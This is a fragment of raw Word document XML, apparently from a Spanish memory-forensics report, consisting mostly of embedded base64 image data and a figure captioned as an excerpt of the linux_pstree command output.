ROyO1w/b4T&#10;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&#10;8xc/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2LwcOXAwAA&#10;JAgAAA4AAAAAAAAAAAAAAAAAOgIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAB5UCtKx&#10;ngAAsZ4AABQAAAAAAAAAAAAAAAAA/QUAAGRycy9tZWRpYS9pbWFnZTEucG5nUEsBAi0AFAAGAAgA&#10;AAAhAIaclhHeAAAABwEAAA8AAAAAAAAAAAAAAAAA4KQAAGRycy9kb3ducmV2LnhtbFBLAQItABQA&#10;BgAIAAAAIQCqJg6+vAAAACEBAAAZAAAAAAAAAAAAAAAAAOulAABkcnMvX3JlbHMvZTJvRG9jLnht&#10;bC5yZWxzUEsFBgAAAAAGAAYAfAEAAN6mAAAAAA==&#10;">
                <v:shape id="Imagen 16" o:spid="_x0000_s1121" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:30924;height:1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KXywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BSwMx&#10;FITvQv9DeII3m7ja2m6bFhEEwUOx1vX6unnd3bp5WZLYrv31Rij0OMzMN8x82dtWHMiHxrGGu6EC&#10;QVw603ClYfPxcjsBESKywdYxafilAMvF4GqOuXFHfqfDOlYiQTjkqKGOsculDGVNFsPQdcTJ2zlv&#10;MSbpK2k8HhPctjJTaiwtNpwWauzouabye/1jNewsqq+9/xwVfXGaFqPNVuLqTeub6/5pBiJSHy/h&#10;c/vVaJhkD2qcPU7v4f9SugNy8QcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAA8qKXywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;">
                  <v:imagedata r:id="rId164" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1122" type="#_x0000_t202" style="position:absolute;left:33948;top:2226;width:20028;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DUyzQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPsPkZG4IJaObhWUZdM0gQS7TCu7cLMarylrkipJt/Lv8QGJo+3n9963XI+2ExcKsfVOwWya&#10;gSBXe926RsHx8+3hCURM6DR23pGCH4qwXk1ullhqf3UHulSpEWziYokKTEp9KWWsDVmMU9+T49vJ&#10;B4uJx9BIHfDK5raTj1lWSIut4wSDPW0N1edqsAr286+9uR9Or7vNPA8fx2FbfDeVUne34+YFRKIx&#10;/Yv/vt81188W+XM+ywumYCZegFz9AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/&#10;AAAAFQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEgQNTLN&#10;AAAA4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAAB&#10;AwAAAAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="67872834" w14:textId="07CAD93B" w:rsidR="00CC13F8" w:rsidRPr="00E72EAD" w:rsidRDefault="00CC13F8" w:rsidP="00CC13F8">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>32</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="85" w:name="_Toc155782599"/>
                        <w:r>
                          <w:t>Extracto de comando linux_pstree.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="85"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una vez obtenido el comando se procederá a adjuntarse a modo de captura del comando ejecutado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706F6FFB" w14:textId="6D406182" w:rsidR="00084B0B" w:rsidRPr="00084B0B" w:rsidRDefault="00084B0B" w:rsidP="00084B0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
